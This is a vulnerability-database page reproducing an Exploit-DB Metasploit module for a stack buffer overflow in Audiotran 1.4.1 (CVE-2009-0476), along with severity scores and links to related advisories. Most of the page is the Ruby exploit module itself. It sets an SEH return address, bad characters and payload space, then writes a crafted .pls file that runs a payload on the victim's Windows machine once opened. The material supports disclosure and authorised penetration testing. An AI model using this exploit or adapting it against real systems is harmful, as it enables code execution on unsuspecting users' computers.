Lucene search
MetasploitEDB-ID:16626HistoryJan 28, 2010 - 12:00 a.m.
Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
2010-01-2800:00:00
Metasploit
www.exploit-db.com
29
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
AI Score
6.6
Confidence
Low
EPSS
0.738
Percentile
98.2%
##
# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audiotran.
This functionality has not been tested in this module.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sebastien Duquette',
'dookie',
],
'Version' => '$Revision: 8306 $',
'References' =>
[
[ 'CVE', '2009-0476'],
[ 'OSVDB', '55424'],
[ 'URL', 'http://www.exploit-db.com/exploits/11079' ],
],
'Payload' =>
{
'Space' => 6000,
'BadChars' => "\x00\x0a\x3d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp
],
'Privileged' => false,
'DisclosureDate' => 'Jan 09 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(1308)
sploit << generate_seh_payload(target.ret)
sploit << rand_text_alpha_upper(8000)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
endRelated
packetstorm
packetstorm
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
2010-02-05 00:00:00
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2009-12-31 00:00:00
openvas
openvas
MultiMedia Soft Audio Products Buffer Overflow Vulnerability
2009-02-20 00:00:00
Euphonics Audio Player Buffer Overflow Vulnerability
2009-02-20 00:00:00
Euphonics Audio Player Buffer Overflow Vulnerability
2009-02-20 00:00:00
exploitdb
exploitdb
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2010-09-25 00:00:00
Audio Workstation 6.4.2.4.3 - '.pls' Local Buffer Overflow (Metasploit)
2009-12-09 00:00:00
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
2009-02-03 00:00:00
prion
prion
Stack overflow
2009-02-08 21:30:00
metasploit
metasploit
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2009-12-10 20:46:53
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
2010-01-28 19:24:41
nvd
nvd
CVE-2009-0476
2009-02-08 21:30:09
checkpoint_advisories
checkpoint_advisories
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow (CVE-2009-0476)
2017-02-13 00:00:00
cvelist
cvelist
CVE-2009-0476
2009-02-08 21:00:00
cve
cve
CVE-2009-0476
2009-02-08 21:30:09
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
AI Score
6.6
Confidence
Low
EPSS
0.738
Percentile
98.2%
Related for EDB-ID:16626